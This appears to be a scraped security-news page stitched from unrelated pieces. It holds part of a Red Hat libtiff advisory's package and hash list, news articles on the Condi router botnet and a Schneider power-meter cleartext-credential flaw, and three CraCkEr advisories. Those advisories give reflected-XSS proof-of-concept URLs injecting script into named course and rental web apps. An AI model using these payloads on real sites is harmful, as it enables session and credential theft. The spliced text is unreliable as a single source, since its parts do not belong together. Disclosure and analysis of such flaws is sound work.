SHA-256: 2c2cf0334a84258dff87aa601297d9979a5d164630c68d45f57092bd2c7f8bdf

libtiff-tools-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: 9fe75a837addcbf0b0e37f3f0c9a3cff91de826d63d567077888d59e4417181a

libtiff-tools-debuginfo-4.4.0-8.el9\_2.x86\_64.rpm

SHA-256: f034829e4b50daecdb8f2b3537ab0a430975d5f4b7c667ccae51d56504156b43

**Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.2**

SRPM

ppc64le

libtiff-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 7f253da209153598ad3f85b9e81c3b43ad2b402244a9847020e1d2d95be9e535

libtiff-debugsource-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: caded15d0d8c1d39f3519f04d2168619a5292d5adafc2650c1996f4683666a11

libtiff-tools-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: e28226834f405403974722cdbdbb18d59a506afb7a79e9f272a4b4c27119a747

libtiff-tools-debuginfo-4.4.0-8.el9\_2.ppc64le.rpm

SHA-256: 9cb9581152dafd784a03157129881298a3b6e03bff334d2cb58977cf53072d9b

**Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.2**

SRPM

s390x

libtiff-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 6102b0a2e0e6872b03b76963401063e43baefae933e239c0fcdd5a7324e27101

libtiff-debugsource-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 8ed17aa5538b765c2617edbe1d8d282b54b8f216e2271e254e46774d8a482e3b

libtiff-tools-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 4556cd54304759d94f1a77fad15139e00e10386150af145d954fd1966518ae40

libtiff-tools-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 116916837954756c6cb926ee3c7b589ece0bca96ca178d4a427a7c879068ace6

**Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.2**

SRPM

aarch64

libtiff-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: aa65c6e39431666d6e37bed633dcb60c34b97c0990bf81ae8aecf95fc582b2a1

libtiff-debugsource-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e186fd0be8fc030963ba5b9eda54a45ca2b63bc1f8e3d9ebe43263e18bfe83cb

libtiff-tools-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 952366c2894732584e76f162dc30fe0c05e34013b7350bac7e1f34ec7c70fd97

libtiff-tools-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e7fc135bf22a69992c66944ff53ccbabc260597db46a61d0bf6ddccaff4a46e6

**Red Hat Enterprise Linux Server for ARM 64 - 4 years of updates 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

aarch64

libtiff-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 276d4da81075b8050887a68d87cf469abd5f1ed795adbeec04e80a79ddd1fb1d

libtiff-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: aa65c6e39431666d6e37bed633dcb60c34b97c0990bf81ae8aecf95fc582b2a1

libtiff-debugsource-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e186fd0be8fc030963ba5b9eda54a45ca2b63bc1f8e3d9ebe43263e18bfe83cb

libtiff-devel-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: 9eda7801b31905db1d7c5ac8534c7185d74f1bb738c916383958b523eb4f67a2

libtiff-tools-debuginfo-4.4.0-8.el9\_2.aarch64.rpm

SHA-256: e7fc135bf22a69992c66944ff53ccbabc260597db46a61d0bf6ddccaff4a46e6

**Red Hat Enterprise Linux Server for IBM z Systems - 4 years of updates 9.2**

SRPM

libtiff-4.4.0-8.el9\_2.src.rpm

SHA-256: f57421d0e5a57634ef082787b29551a3ebc8cc60a07ad1f24742abb6e095b67d

s390x

libtiff-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 85c061d39331a2e28033cfe0e70ec3f6894048244023f2c24e2397b537d3141a

libtiff-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 6102b0a2e0e6872b03b76963401063e43baefae933e239c0fcdd5a7324e27101

libtiff-debugsource-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 8ed17aa5538b765c2617edbe1d8d282b54b8f216e2271e254e46774d8a482e3b

libtiff-devel-4.4.0-8.el9\_2.s390x.rpm

SHA-256: fa1f43adef33de55498583000960b62dc89599acb3b60f16abc450eec7cd28da

libtiff-tools-debuginfo-4.4.0-8.el9\_2.s390x.rpm

SHA-256: 116916837954756c6cb926ee3c7b589ece0bca96ca178d4a427a7c879068ace6

RHSA-2023:3711: Red Hat Security Advisory: libtiff security update

A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet.
Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel

Network Security / Botnet

A new malware called **Condi** has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet.

Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez.

"The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said.

An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot.

To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot the system -

*   /usr/sbin/reboot
*   /usr/bin/reboot
*   /usr/sbin/shutdown
*   /usr/bin/shutdown
*   /usr/sbin/poweroff
*   /usr/bin/poweroff
*   /usr/sbin/halt
*   /usr/bin/halt

Condi, unlike some botnets which propagate by means of brute-force attacks, leverages a scanner module that checks for vulnerable TP-Link Archer AX21 devices and, if so, executes a shell script retrieved from a remote server to deposit the malware.

Specifically, the scanner singles out routers susceptible to CVE-2023-1389 (CVSS score: 8.8), a command injection bug that was previously exploited by the Mirai botnet.

Fortinet said it came across other Condi samples that exploited several known security flaws for propagation, suggesting that unpatched software is at risk of being targeted by botnet malware.

The aggressive monetization tactics aside, Condi aims to ensnare the devices to create a powerful DDoS botnet that can be rented by other actors to orchestrate TCP and UDP flood attacks on websites and services.

"Malware campaigns, especially botnets, are always looking for ways to expand," the researchers said. "Exploiting recently discovered (or published) vulnerabilities has always been one of their favored methods."

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

The development comes as the AhnLab Security Emergency Response Center (ASEC) revealed that poorly managed Linux servers are being breached to deliver DDoS bots such as ShellBot and Tsunami (aka Kaiten) as well as stealthily abuse the resources for cryptocurrency mining.

"The source code of Tsunami is publicly available so it is used by a multitude of threat actors," ASEC said. "Among its various uses, it is mostly used in attacks against IoT devices. Of course, it is also consistently used to target Linux servers."

The attack chains entail compromising the servers using a dictionary attack to execute a rogue shell script capable of downloading next-stage malware and maintaining persistent backdoor access by adding a public key to the .ssh/authorized\_keys file.

The Tsunami botnet malware used in the attack is a new variant called Ziggy that shares significant overlaps with the original source code. It further employs the Internet relay chat (IRC) for command-and-control (C2).

Also used during the intrusions is a set of ancillary tools for privilege escalation and altering or erasing log files to conceal the trail and hinder analysis.

"Administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks," ASEC said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

A severe security vulnerability allows credentials for the power meters to continuously transmit in cleartext, allowing device takeover.

INFOSEC23 – London – A security vulnerability in the Schneider Electric ION and PowerLogic power meters has been disclosed: They transmit a user ID and password in plaintext with every message.

Given a CVSS vulnerability-severity rating of 8.8 out of 10, the bug would allow an attacker with passive interception capabilities to obtain these credentials, authenticate to the ION/TCP engineering interface (as well as SSH and HTTP interfaces), and change configuration settings or potentially modify firmware.

"It's obviously not acceptable anymore for an operational technology (OT) product to transmit credentials in in cleartext because anybody that has access to the network and can sniff the traffic will be able to get them, and then do almost whatever they want with the device," says Daniel dos Santos, head of security research at Forescout. This could include controlling smart meter switches to cause load oscillations that could trigger shutdowns, with the demand (or load) then being passed on to other parts of the grid network. In a worst-case scenario, a domino effect could theoretically lead to a blackout.

Disclosed as part of the Forescout's Icefall OT research, this vulnerability is one of three announced today at Infosecurity Europe, the other two being denial-of-service (DoS) vulnerabilities in WAGO 740 controllers. Both of the DoS issues are given a severity rating of 4.9.

Schneider said in its advisory that the ION Protocol was created over 30 years ago to bring sophisticated data exchange to digital power meters, and as cybersecurity became a concern, the protocol was enhanced with support for authentication. 

But that doesn't mean there aren't still security holes, as there often are with legacy code. In fact, dos Santos says the Schneider vulnerability was originally due to be released as part of a bundle of 56 OT flaws in June 2022 but was held up due to patching processes.

"It's one of those examples of things that were designed at an earlier time, and Schneider definitely recognizes that \[this is a vulnerability\] and we worked with them to bring it up to the present, by finding the issue and fixing it," he says.

He adds, “Now this is a secure version of this protocol that has encryption where the credentials are not transmitted in plaintext anymore. So it's definitely a relevant enough issue that made them reevaluate the need for a secure version of the protocol for a product line that is older but still used a lot."

**Cybersecurity by Design is Still Missing for OT**

The Forescout research noted that this showcases that there's still a lack of fundamental understanding of security-by-design by OT vendors, with recurring design issues that demonstrate a lack of understanding of basic security control design, such as plaintext and/or hardcoded credentials, client-side authentication, stateful control on stateless protocols, missing critical steps in authentication, broken algorithms, and faulty implementations.

As dos Santos says: "Everybody knows that OT has almost no security built by design, right? That's a fact, but what we always wanted to stress around the fact was the fact that you need to measure how insecure it is. You cannot just say 'your whole OT is insecure'; you need to say there is insecure engineering, protocols, insecure firmware updates, and so on.”

Forescout used the release of these new vulnerabilities to call on vendors to improve their security testing procedures, and it said products and protocols must remain backward compatible with legacy designs.

Dos Santos says some vendors still have issues with backward compatibility, as legacy products have hardcoded credentials with insecure methods of delivery. "The main reason why things were designed insecurely at the time is because security wasn't a big concern, but now it's the need for for backward compatibility and the need for maintaining some product lines that are still used: but there are people still using those because the lifespan is 20 to 30 years."

Schneider Power Meter Vulnerability Opens Door to Power Outages

Coursela Personal Course Selling Website version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/user/kreativdev/portfolio                           ││  Vendor   : KreativDev                                                                 ││  Software : Coursela - Personal Course Selling Website 1.0                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /coursesGET parameter 'min' is vulnerable to RXSShttps://website/courses?type=free&category=software-development&min=4443874%3balert(1)%2f%2f165&max=99Path: /coursesGET parameter 'max' is vulnerable to RXSShttps://website/courses?type=free&category=software-development&min=44&max=9989896%3balert(1)%2f%2f939[-] Done

Coursela Personal Course Selling Website 1.0 Cross Site Scripting

Coursemat Multi-Tenant Course Selling Website version 1.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/user/kreativdev/portfolio                           ││  Vendor   : KreativDev                                                                 ││  Software : Coursemat - Multi-Tenant Course Selling Website 1.1                        ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /coursesGET parameter 'min' is vulnerable to RXSShttps://website/courses?type=premium&category=software-development&min=4615384%3balert(1)%2f%2f359&max=99Path: /coursesGET parameter 'max' is vulnerable to RXSShttps://website/courses?type=premium&category=software-development&min=46&max=9968240%3balert(1)%2f%2f920[-] Done

Coursemat Multi-Tenant Course Selling Website 1.1 Cross Site Scripting

RentEquip Multipurpose Rental version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/user/kreativdev/portfolio                           ││  Vendor   : KreativDev                                                                 ││  Software : RentEquip - Multipurpose Rental 1.0                                        ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/productsGET parameter 'min' is vulnerable to RXSShttps://website/shop/products?category=cordless-tools&min=1026553%3balert(1)%2f%2f772&max=227Path: /shop/productsGET parameter 'max' is vulnerable to RXSShttps://website/shop/products?category=cordless-tools&min=10&max=22724204%3balert(1)%2f%2f287[-] Done

Tag

#ssh